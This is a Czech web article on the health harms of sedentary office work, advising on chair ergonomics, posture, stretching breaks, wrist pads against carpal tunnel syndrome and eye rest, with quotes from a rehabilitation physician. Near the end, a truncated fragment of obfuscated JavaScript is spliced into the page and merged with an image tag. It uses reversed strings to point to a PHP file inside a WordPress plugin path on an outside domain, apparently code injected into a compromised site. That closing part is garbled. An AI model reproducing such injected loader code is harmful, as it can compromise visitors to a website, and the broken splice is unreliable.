FACESTARZdravíSedavé zaměstnání nás pomalu ničí

Sedavé zaměstnání nás pomalu ničí

 

 

Zdravé sezení neexistuje

Bohužel, hned na začátku vás zklameme. Neexistuje totiž zcela zdravé a neškodící sezení. Přesto lze jeho negativa výrazně eliminovat a dopady na zdraví minimalizovat. Velmi důležitá je židle, či křeslo, na kterém sedíte. Špatná židle totiž může způsobit značné bolesti v zádech a také hlavy. Pokud už vy, nebo váš zaměstnavatel neinvestujete do přísně ergonomické židle, určitě volte takovou, kterou je možné nastavovat. Všimněte si, zda máte při sezení nohy v pravém úhlu a zda je pohodlně položíte na zem. Opěrátko židle by vás mělo jemně tlačit do zad, sedět byste měli až vzadu na židli. Nezapomínejte na vzpřímené držení krku a zad! Na židli se nijak nekruťte a neseďte zhroucení. Ramena držte dole, nevytahujte je nahoru.

Dělejte přestávky a cvičte

Během práce u počítače byste měli dělat přestávky na protažení, či cvičení: „Velmi relaxačně působí protažení zad v předklonu i záklonu a propnutými pažemi, kdy pohybem těla ze strany na stranu opisujete tvar ležaté osmičky vsedě, nebo ve stoje. Pohyby by měly být pomalé a plynulé a zpočátku v malém rozsahu,“ doporučuje primářka Rehabilitačního ústavu Brandýs nad Orlicí Michaela Tomanová.

Používejte podložky

Nezdravá je i sama práce s počítačem, či notebookem. Pokud má váš monitor dotykový displej, jistě mi dáte zapravdu, že je značně náročné ovládat programy pouze rukou. Hrozí tak, že vás bude brzo bolet v zápěstí, které je značně namáhané. Nezdravé je vlastně i používání touchpadu. Nejméně škodlivé se tak jeví ovládání počítače myší a klávesnicí, ale za pomoci chytrých doplňků.

Při práci na počítači vám totiž hrozí syndrom karpálního tunelu, který se projevuje bolestí v zápěstí a brněním a který je dnes velmi rozšířený, léčí se však pomalu a s nejistým výsledkem. Proto si pořiďte za pár korun gelovou podložku pod myš a pod klávesnici, které zápěstí ruky značně uleví. I zápěstí doporučují lékaři procvičovat: „Občas si udělejte alespoň jeden cvik, při kterém si protáhnete paži a ulevíte si od strnulé pozice. Například můžete celou paži včetně zápěstí a prstů (buď ve visu, nebo na stole) dát do opačného postavení než při práci s myší. To znamená, že paži vytočíte zevně a s mírným odporem protáhnete včetně ruky,“ vysvětluje primářka Rehabilitačního ústavu Brandýs nad Orlicí MUDr. Michaela Tomanová.

Oči trpí v neposlední řadě

A v neposlední řadě šetřete také oči, které prací na počítači značně trpí. Dbejte na dostatečnou vzdálenost od monitoru počítače. Občas během práce se zadívejte na moment do dálky, tyto přestávky dělejte co tři minuty. 

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandys_nad_Orlici1.jpg“ alt=““ />

Související články